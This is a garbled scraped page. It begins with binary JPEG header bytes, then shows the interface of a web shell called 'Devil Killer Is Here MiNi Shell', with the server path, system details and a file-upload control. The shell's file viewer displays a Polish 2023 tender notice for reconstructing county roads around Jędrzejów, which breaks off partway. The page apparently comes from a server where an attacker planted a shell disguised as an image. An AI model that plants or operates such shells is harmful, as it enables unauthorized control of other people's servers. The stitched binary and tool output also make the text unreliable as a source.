JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230310/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230310/0012957101-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa dróg powiatowych Powiatu Jędrzejowskiego </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Jędrzejowski - Zarząd Dróg Powiatowych</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 299943379</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Okrzei 83</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Jędrzejów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">28-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">świętokrzyskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL722 - Sandomiersko-jędrzejowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zdp@zdpjedrzejow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.powiatjedrzejow.pl/bipkod/012/004/004/003</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa dróg powiatowych Powiatu Jędrzejowskiego </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-15b00197-bf18-11ed-8261-62cbbe4d0ca4</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00129571</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-03-10</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00062900/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.11 Przebudowa dróg powiatowych Powiatu Jędrzejowskiego. Gmina Sędziszów, Wodzisław, Słupia</p> <p class="mb-0">1.1.12 Przebudowa dróg powiatowych Powiatu Jędrzejowskiego. Gmina Małogoszcz, Nagłowice, Oksa</p> <p class="mb-0">1.1.13 Przebudowa dróg powiatowych Powiatu Jędrzejowskiego. Gmina Sobków, Jędrzejów, Imielno</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zdpjedrzejow.ezamawiajacy.pl/servlet/HomeServlet <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zdpjedrzejow.ezamawiajacy.pl/servlet/HomeServlet</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający dopuszcza możliwość przekazywania sobie przez strony postępowania oświadczeń, wniosków, zawiadomień oraz informacji: elektronicznie za pośrednictwem Platformy znajdującej się pod adresem: https://zdpjedrzejow.ezamawiajacy.pl w zakładce „Korespondencja”.2. Ogólne zasady korzystania z Platformy, Zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu na subdomenie ZDP Jędrzejów https://zdpjedrzejow.ezamawiajacy.pl , lub https://oneplace.marketplanet.pl<br/>Rejestracja Wykonawcy trwa maksymalnie do 2 dni roboczych. W związku z tym Zamawiający zaleca Wykonawcom uwzględnienie czasu niezbędnego na rejestrację w procesie złożenia Oferty w postaci elektronicznej. Po założeniu konta Wykonawca ma możliwość złożenia Oferty w postępowaniu. Komunikacja między Zamawiającym a Wykonawcami, w szczególności zawiadomienia oraz informacje, przekazywane są w formie elektronicznej za pośrednictwem Platformy Zakupowej. Za datę przekazania<br/>zaświadczeń oraz informacji przyjmuje się datę ich wysłania za pośrednictwem zakładki „Korespondencja”.Zamawiający<br/>informuje, iż w przypadku jakichkolwiek wątpliwości związanych z zasadami korzystania z Platformy, Wykonawca winien skontaktować się z dostawcą rozwiązania teleinformatycznego Platformy zakupowej ZDP Jędrzejów: eZamawiający, tel. +48 22 576 22 23 (infolinia dostępna w dni robocze, w godzinach 9.00-17.00) e-mail: oneplace@marketplanet.plZamawiający zgodnie z § 4 Rozporządzenia Prezesa Rady Ministrów w sprawie użycia środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego oraz udostępnienia i przechowywania dokumentów<br/>elektronicznych (Dz. U. z 2020 r. poz. 1261) - zwane dalej „Rozporządzeniem&#34; określa dopuszczalny format podpisu elektronicznego, jako:- dokumenty w formacie „pdf&#34; zaleca się podpisywać formatem PAdES,- dopuszcza się podpisanie dokumentów w formacie innym niż „pdf&#34;, wtedy będzie wymagany oddzielny plik z podpisem. W związku z tym Wykonawca będzie<br/>zobowiązany załączyć, prócz podpisanego dokumentu, oddzielny plik z podpisem.Zamawiający, zgodnie z § 3 ust. 3 ww. Rozporządzenia określa niezbędne wymagania sprzętowo- aplikacyjne umożliwiające pracę na Platformie Zakupowej tj.:- Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;- Komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV 2GHZ, jeden z systemów operacyjnych - MS Windows 7 , Mac Os x 10.4, Linux,<br/>lub ich nowsze wersje;- Zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2, najlepiej w najnowszej wersji w przypadku Internet Explorer minimalnie wersja 10.0;- Włączona obsługa JavaScript;- Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie<br/>.pdf.Zamawiający zgodnie z § 3 ust. 3 ww. Rozporządzenia, określa dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 100 MB w txt, rtf, pdf ,xps, odt, ods, odp, doc, xls, ppt, docx, xlsx, pptx, csv, jpg, jpeg, tif, tiff, geotiff, png, svg, wav, mp3, avi, mpg, mpeg, mp4, m4a, mpeg4, ogg, ogv, zip, tar, gz, gzip, 7z, html, xhtml, css, xml, xsd, gml, rng, xsl, xslt, TSL, XMLsig,<br/>XAdES, CAdES, ASIC, XMLenc.Zamawiający zgodnie z § 3 ust. 3 ww. Rozporządzenia określa informacje na temat kodowania i czasu odbioru danych tj.: plik załączony przez Wykonawcę na Platformie Zakupowej i zapisany, widoczny jest w Systemie, jako zaszyfrowany – format kodowania UTF8. Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez zamawiającego po upływie terminu otwarcia ofert</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych), dalej „RODO”, informuję, że:<br/>- administratorem Pani/Pana danych osobowych jest Zarząd Dróg Powiatowych w Jędrzejowie, ul. Okrzei 83, 28-300 Jędrzejów;<br/>- w sprawach z zakresu ochrony danych osobowych mogą Państwo kontaktować się z Inspektorem Ochrony Danych pod adresem<br/>e-mail: inspektor@cbi24.pl - Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego nr postępowania ZP.451.Rb.01.2023, prowadzonym w trybie podstawowym; 2. Odbiorcami Pani/Pana danych osobowych będą: - upoważnieni pracownicy Zarządu Dróg Powiatowych w Jędrzejowie - spółka Otwarty Rynek Elektroniczny S.A. siedzibą w Warszawie (02-672) przy ul. Domaniewskiej 49, wpisaną do Rejestru Przedsiębiorców<br/>Krajowego Rejestru Sądowego, prowadzonego przez Sąd Rejonowy dla m.st. Warszawy w Warszawie XIII Wydział Gospodarczy Krajowego Rejestru<br/>Sądowego pod numerem KRS: 0000041441, REGON: 017282436, NIP: 526-25-35-153, jako właściciel Platformy Zakupowej, na której Zarząd Dróg Powiatowych w Jędrzejowie prowadzi postępowania o udzielenie zamówienia publicznego, działającą pod adresem: https://zdpjedrzejow.ezamawiajacy.pl - osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu<br/>o art. 18 oraz art. 74 ust. 1 ustawy Pzp. 3. Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia w sposób 4. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych<br/>wynikają z ustawy Pzp; 5. W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO; 6. Posiada Pani/Pan: - na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących; - na<br/>podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych; (skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników) - na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w<br/>art. 18 ust. 2 RODO ***; (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego) - prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza<br/>przepisy RODO</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Nie przysługuje Pani/Panu: - w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych; - prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO; - na podstawie art. 21<br/>RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO. Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia publicznego.<br/>W trakcie oraz po zakończeniu postępowania o udzielenie zamówienia publicznego, w przypadku gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 rozporządzenia 2016/679, wymagałoby niewspółmiernie dużego wysiłku, zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.451.Rb.01.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> SĘDZISZÓW<br/>Zadanie 1: Przebudowa drogi powiatowej nr1168T Trzciniec-Krzcięcice polegająca na wykonaniu chodnika w m. Łowinia od km 2+416 do km 2+716<br/>Zakres robót: roboty przygotowawcze i zimne, podbudowa, elementy ulicy, roboty wykończeniowe<br/><br/>Zadanie 2: Przebudowa drogi powiatowej nr 1169T Łowinia-Sędziszów polegająca na wykonaniu chodnika w m. Sędziszów (ul. Jędrzejowska) od km 3+560 do km 3+985<br/>Zakres robót: roboty przygotowawcze i zimne, podbudowa, elementy ulicy, roboty wykończeniowe<br/><br/>Zadanie 3: Przebudowa drogi powiatowej nr 1163T Rożnica-Sędziszów-Tarnawa polegająca na wykonaniu chodnika w m. Sosnowiec od km 2+680 do km 2+980<br/>Zakres robót: roboty przygotowawcze i zimne, podbudowa, elementy ulicy, roboty wykończeniowe<br/><br/>Zadanie 4: Przebudowa drogi powiatowej nr 1151T Wywła-Sędziszów-Wodzisław-Wola Lubecka polegająca na wykonaniu chodnika w m. Tarnawa od km 10+795 do km 11+106<br/>Zakres robót: roboty przygotowawcze i zimne, podbudowa, elementy ulicy, roboty wykończeniowe<br/><br/>Zadanie 5: Przebudowa drogi powiatowej nr 1153T Przełaj-Wodzisław polegająca na wykonaniu chodnika w m. Przełaj od km 1+830 do km 2+065<br/>Zakres robót: roboty przygotowawcze i zimne, podbudowa, elementy ulicy, roboty wykończeniowe<br/><br/>Zadanie 6: Przebudowa drogi powiatowej nr 1145T Michałów-Niegosławice-Mierzawa-Sędziszów-Klimontów polegająca na wykonaniu chodnika na odc. Piła-Gniewięcin od km 26+669 do km 27+069<br/>Zakres robót: roboty przygotowawcze i zimne, podbudowa, elementy ulicy, roboty wykończeniowe<br/><br/>Zadanie 7: Przebudowa drogi powiatowej nr 1153T Przełaj-Wodzisław polegająca na wykonaniu chodnika na odc. Podsadek-Jeżów od km 7+521 do km 7+825<br/>Zakres robót: roboty przygotowawcze i zimne, podbudowa, elementy ulicy, roboty wykończeniowe<br/><br/>WODZISŁAW: <br/>Zadanie 8: Przebudowa drogi powiatowej nr 1149T Boleścice -Laskowa -Wodzisław na odc. Jeziorki-<br/>Klemencice od km 7+390 do km 8+000<br/>Zakres robót: wymiana uszkodzonej podbudowy 610 mb x 5,5 m, nawierzchnia <br/><br/>Zadanie 9: Przebudowa drogi powiatowej nr 1153T Przełaj -Wodzisław w m. Kowalów Dolny <br/>od km 14+800 do km 15+100<br/>Zakres robót: chodnik w km 14+690 do km 15+200, poszerzenie do 6,0 m, nawierzchnia i elementy ulicy<br/><br/>Zadanie 10: Przebudowa drogi powiatowej nr 1149T Boleścice -Laskowa -Wodzisław w m. Wodzisław <br/>od km 13+550 do km 13+950<br/>Zakres robót: roboty przygotowawcze, poszerzenie do 5,5 m, nawierzchnia, roboty wykończeniowe<br/><br/><br/>SŁUPIA<br/>Zadanie 11: Przebudowa drogi powiatowej nr 1151T Wywła-Sędziszów-Wodzisław-Wola Lubecka polegająca na wykonaniu chodnika w m. Wywła od km 1+390 do km 2+140<br/>Zakres robót: roboty przygotowawcze i zimne, podbudowa, elementy ulicy, roboty wykończeniowe<br/><br/>Zadanie 12: Przebudowa drogi powiatowej nr 1151T Wywła-Sędziszów-Wodzisław-Wola Lubecka polegająca na wykonaniu chodnika w m. Nowa Wieś od km 7+925 do km 8+370<br/>Zakres robót: roboty przygotowawcze i zimne, podbudowa, elementy ulicy, roboty wykończeniowe </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 6577003,97 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233222-1 - Roboty budowlane w zakresie układania chodników i asfaltowania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233140-2 - Roboty drogowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">18 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje udzielenie zamówień podobnych, o których mowa w art. 214 ust.1 pkt 7 ustawy Pzp w okresie trzech lat od udzielenia zamówienia podstawowego dotychczasowemu wykonawcy, zamówienia polegającego na powtórzeniu podobnych robót budowlanych do 30% wartości zamówienia podstawowego. Skorzystanie z możliwości udzielenia tego zamówienia może nastąpić jeżeli pojawi się potrzeba wynikająca ze stanu dróg a zamawiający będzie dysponował środkami na realizację tego zamówienia</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zgodnie z zapisami SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> MAŁOGOSZCZ:<br/>Zadanie 13: Przebudowa drogi powiatowej nr 1182T Ludynia-Kozłów-Małogoszcz polegająca na wykonaniu chodnika w m. Kozłów od km 13+370 do km 13+573<br/>Zakres robót: roboty przygotowawcze i zimne, podbudowa, elementy ulicy, roboty wykończeniowe<br/><br/>Zadanie 14: Przebudowa drogi powiatowej nr 1119T Tyniec-Oksa-Mieronice-Miąsowa polegająca na wykonaniu chodnika w m. Żarczyce Duże od km 19+225 do km 19+430<br/>Zakres robót: roboty przygotowawcze i zimne, podbudowa, elementy ulicy, roboty wykończeniowe<br/><br/>Zadanie 15: Przebudowa drogi powiatowej nr 1178T Żarczyce Małe-Lipnica polegająca na wykonaniu chodnika w m. Lipnica od km 8+187 do km 8+350<br/>Zakres robót: roboty przygotowawcze i zimne, podbudowa, elementy ulicy, roboty wykończeniowe<br/><br/>Zadanie 16: Przebudowa drogi powiatowej nr 1188T Skorków-Leśnica polegająca na wykonaniu chodnika w m. Leśnica od km 10+630 do km 10+834<br/>Zakres robót: roboty przygotowawcze i zimne, podbudowa, elementy ulicy, roboty wykończeniowe<br/><br/>Zadanie 17: Przebudowa drogi powiatowej nr 1178T Żarczyce Małe-Lipnica polegająca na wykonaniu chodnika w m. Wygnanów od km 2+600 do km 2+720 wraz z odwodnieniem drogi od km 2+600 <br/>do km 2+880<br/>Zakres robót: roboty przygotowawcze i zimne, podbudowa, elementy ulicy, roboty wykończeniowe<br/><br/>Zadanie 18: Przebudowa drogi powiatowej nr 1119T Tyniec-Oksa-Mieronice-Miąsowa polegająca na wykonaniu chodnika w m. Mieronice od km 22+070 do km 22+380<br/>Zakres robót: roboty przygotowawcze i zimne, podbudowa, elementy ulicy, roboty wykończeniowe<br/><br/>NAGŁOWICE<br/>Zadanie 19: Przebudowa drogi powiatowej nr 1141T Deszno-Zagórze-Potok Mały w m. Zagórze od km 2+485 do km 2+760<br/>Zakres robót: roboty przygotowawcze, poszerzenie jezdni, nawierzchnia, roboty wykończeniowe<br/><br/>Zadanie 20: Przebudowa drogi powiatowej nr 1166T Nagłowice-Sędziszów polegająca na wykonaniu chodnika w m. Nagłowice (ul. Parkowa) od km 0+834 do km 1+380<br/>Zakres robót: roboty przygotowawcze i zimne, podbudowa, elementy ulicy, roboty wykończeniowe<br/><br/>Zadanie 21: Przebudowa drogi powiatowej nr 1139T Jaronowice-Skroniów-Dalechowy polegająca na wykonaniu chodnika w m. Warzyn Pierwszy od km 10+695 do km 10+887<br/>Zakres robót: roboty przygotowawcze i zimne, podbudowa, elementy ulicy, roboty wykończeniowe<br/><br/>Zadanie 22: Przebudowa drogi powiatowej nr 1171T Zdanowice-Brynica Mokra polegająca na wykonaniu chodnika w m. 